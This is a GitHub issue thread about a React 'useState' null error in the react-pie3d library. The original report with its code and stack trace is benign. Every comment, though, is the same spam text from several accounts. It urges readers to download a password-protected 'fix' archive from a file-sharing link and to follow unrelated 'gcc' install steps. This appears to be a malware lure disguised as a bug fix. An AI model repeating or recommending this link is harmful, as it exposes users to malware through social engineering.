### ISSUE TITLE
Cannot read properties of null (reading 'useState')

### ISSUE THREAD

**Issue by imanshul** [woles/react-pie3d#54]
Please provide proper usage in documentation, it's of no use if you don't provide correct info.

```JS
import React from 'react';
import { Box } from '@mui/material';
import { Pie3D } from 'react-pie3d'

const Gradient3DPie = () => {
  const data = [10, 20, 30]

  const config = {
    // Configuration options according to the library's documentation
  };

  return (
    <Box>
      <Pie3D config={config} data={data} />
    </Box>
  );
};

export default Gradient3DPie;
```

Getting below error: 

ERROR
Cannot read properties of null (reading 'useState')
TypeError: Cannot read properties of null (reading 'useState')
    at useState (http://localhost:3000/static/js/bundle.js:74845:25)
    at Pie3D (http://localhost:3000/static/js/bundle.js:72790:33)
    at renderWithHooks (http://localhost:3000/static/js/bundle.js:60015:22)
    at mountIndeterminateComponent (http://localhost:3000/static/js/bundle.js:63986:17)
    at beginWork (http://localhost:3000/static/js/bundle.js:65289:20)
    at HTMLUnknownElement.callCallback (http://localhost:3000/static/js/bundle.js:50271:18)
    at Object.invokeGuardedCallbackDev (http://localhost:3000/static/js/bundle.js:50315:20)
    at invokeGuardedCallback (http://localhost:3000/static/js/bundle.js:50372:35)
    at beginWork$1 (http://localhost:3000/static/js/bundle.js:70270:11)
    at performUnitOfWork (http://localhost:3000/static/js/bundle.js:69518:16)

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
